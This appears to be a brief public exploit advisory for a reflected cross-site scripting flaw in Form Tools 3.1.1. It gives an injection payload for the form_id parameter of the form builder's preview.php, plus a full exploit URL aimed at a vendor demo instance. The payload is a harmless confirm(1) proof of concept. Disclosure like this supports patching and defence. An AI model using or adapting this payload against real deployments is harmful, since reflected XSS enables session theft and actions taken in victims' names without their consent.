Headline
Form Tools 3.1.1 Cross Site Scripting
Form Tools version 3.1.1 suffers from a cross site scripting vulnerability.
# Exploit Title: Form Tools Version: 3.1.1 - Reflected XSS # Date: 2024-6-1# Exploit Author: tmrswrr# Vendor Homepage: https://formtools.org/# Version: 3.1.1# Tested on: https://www.softaculous.com/demos/Form_Tools1 ) Write after form_id your payload : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2 Payload : "><sVg/onLy=1 onLoaD=confirm(1)//2 ) You will bee alert button : https://demos2.softaculous.com/Form_Toolsdswyuy0rdr/modules/form_builder/preview.php?form_id=2%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//